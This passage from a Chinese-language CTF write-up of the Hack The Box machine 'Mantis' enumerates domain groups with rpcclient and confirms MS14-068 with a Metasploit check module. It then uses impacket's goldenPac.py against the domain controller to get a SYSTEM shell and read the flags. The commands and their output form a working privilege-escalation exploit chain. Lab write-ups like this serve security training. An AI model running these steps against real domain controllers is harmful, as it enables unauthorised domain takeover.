<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs inform7">rpcclient $&gt; enumalsgroups domain<br>group:<span class="hljs-comment">[Cert Publishers]</span> rid:<span class="hljs-comment">[0x205]</span><br>group:<span class="hljs-comment">[RAS and IAS Servers]</span> rid:<span class="hljs-comment">[0x229]</span><br>group:<span class="hljs-comment">[Allowed RODC Password Replication Group]</span> rid:<span class="hljs-comment">[0x23b]</span><br>group:<span class="hljs-comment">[Denied RODC Password Replication Group]</span> rid:<span class="hljs-comment">[0x23c]</span><br>group:<span class="hljs-comment">[DnsAdmins]</span> rid:<span class="hljs-comment">[0x44d]</span><br>group:<span class="hljs-comment">[SQLServer2005SQLBrowserUser$MANTIS]</span> rid:<span class="hljs-comment">[0x450]</span><br>rpcclient $&gt; <br></code></pre></td></tr></table></figure>

<p>我会注意到DnsAdmins组，因为之前我通过远程注入DLL获取到过一台机器的system shell，SQLServer2005SQLBrowserUser$MANTIS我也会注意，因为我便是通过SQLServer获取到的凭证。</p>
<p>我有个合法的账户口令，但是我却登录不上去，因为目标也没有开启winrm协议端口，也未开启RDP。</p>
<p>但是windows 2008 作为域控服务器会存在一个漏洞，MS14-068域控提权漏洞(CVE-2014-6324），我习惯枚举敏感信息收集以及错误配置了，要不是又在标签中看到了CVE-2014-6324，我都没想到还有漏洞利用。如想了解更多的细节可参考以下文章：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>labs.f-secure.com<span class="hljs-regexp">/archive/</span>digging-into-ms14-<span class="hljs-number">068</span>-exploitation-and-defence/<br></code></pre></td></tr></table></figure>

<p>Metasploit只有该漏洞的检测模块，没有该漏洞的利用模块。</p>
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs prolog">sf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) &gt; run<br>[*] <span class="hljs-symbol">Running</span> module against <span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span><br><br>[*] <span class="hljs-symbol">Validating</span> options...<br>[*] <span class="hljs-symbol">Using</span> domain <span class="hljs-symbol">HTB</span>.<span class="hljs-symbol">LOCAL</span>...<br>[*] <span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span>:<span class="hljs-number">88</span> - <span class="hljs-symbol">Sending</span> <span class="hljs-symbol">AS</span>-<span class="hljs-symbol">REQ</span>...<br>[*] <span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span>:<span class="hljs-number">88</span> - <span class="hljs-symbol">Parsing</span> <span class="hljs-symbol">AS</span>-<span class="hljs-symbol">REP</span>...<br>[*] <span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span>:<span class="hljs-number">88</span> - <span class="hljs-symbol">Sending</span> <span class="hljs-symbol">TGS</span>-<span class="hljs-symbol">REQ</span>...<br>[+] <span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span>:<span class="hljs-number">88</span> - <span class="hljs-symbol">Valid</span> <span class="hljs-symbol">TGS</span>-<span class="hljs-symbol">Response</span>, extracting credentials...<br>[+] <span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span>:<span class="hljs-number">88</span> - <span class="hljs-symbol">MIT</span> <span class="hljs-symbol">Credential</span> <span class="hljs-symbol">Cache</span> saved on /opt/metasploit/apps/pro/loot/<span class="hljs-number">20220424175459</span><span class="hljs-symbol">_default_10</span><span class="hljs-number">.10</span><span class="hljs-number">.10</span><span class="hljs-number">.52</span><span class="hljs-symbol">_windows</span>.kerberos_724354.bin<br>[*] <span class="hljs-symbol">Auxiliary</span> module execution completed<br></code></pre></td></tr></table></figure>

<p>但是它可以帮我验证目标确实存在该漏洞，漏洞利用脚本在&#x2F;impacket-0.9.24&#x2F;examples中：</p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs inform7">$ ./goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local<br>Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation<br><br>Password:<br><span class="hljs-comment">[*]</span> User SID: S-1-5-21-4220043660-4019079961-2895681657-1103<br><span class="hljs-comment">[-]</span> Couldn&#x27;t get forest info (<span class="hljs-comment">[Errno Connection error (htb.local:445)]</span> <span class="hljs-comment">[Errno -2]</span> Name or service not known), continuing<br><span class="hljs-comment">[*]</span> Attacking domain controller 10.10.10.52<br><span class="hljs-comment">[*]</span> 10.10.10.52 found vulnerable!<br><span class="hljs-comment">[*]</span> Requesting shares on 10.10.10.52.....<br><span class="hljs-comment">[*]</span> Found writable share ADMIN$<br><span class="hljs-comment">[*]</span> Uploading file DorWWjHF.exe<br><span class="hljs-comment">[*]</span> Opening SVCManager on 10.10.10.52.....<br><span class="hljs-comment">[*]</span> Creating service QvJn on 10.10.10.52.....<br><span class="hljs-comment">[*]</span> Starting service QvJn.....<br><span class="hljs-comment">[!]</span> Press help for extra shell commands<br>Microsoft Windows <span class="hljs-comment">[Version 6.1.7601]</span><br>Copyright (c) 2009 Microsoft Corporation.  All rights reserved.<br><br>C:\Windows\system32&gt;whoami<br>nt authority\system<br><br>C:\Windows\system32&gt;<br></code></pre></td></tr></table></figure>

<p>注意密码，尽量自己手动输入，因为复制粘贴会很坑，我觉得是作者故意的，密码中的一些特殊符号会导致很多工具对参数错误的识别。</p>
<h5 id="获取flag："><a href="#获取flag：" class="headerlink" title="获取flag："></a>获取flag：</h5><figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs moonscript"><span class="hljs-name">C</span>:\Users\james&gt;cd desktop<br> <br><span class="hljs-name">C</span>:\Users\james\Desktop&gt;<span class="hljs-built_in">type</span> user.txt<br><br><span class="hljs-name">C</span>:\Users\Administrator\Desktop&gt;<span class="hljs-built_in">type</span> root.txt<br></code></pre></td></tr></table></figure>




                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Hack-The-Box/" class="category-chain-item">Hack The Box</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Active-Directory/" class="print-no-link">#Active Directory</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>HTB Walkthrough - Mantis</div>
      <div>https://crazyinside.github.io/post/HackTheBox-Mantis.html</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>World'sEnd</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>August 14, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/post/HackTheBox-Meta.html" title="HTB Walkthrough - Meta">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HTB Walkthrough - Meta</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/post/HackTheBox-Json.html" title="HTB Walkthrough - Json">
                        <span class="hidden-mobile">HTB Walkthrough - Json</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
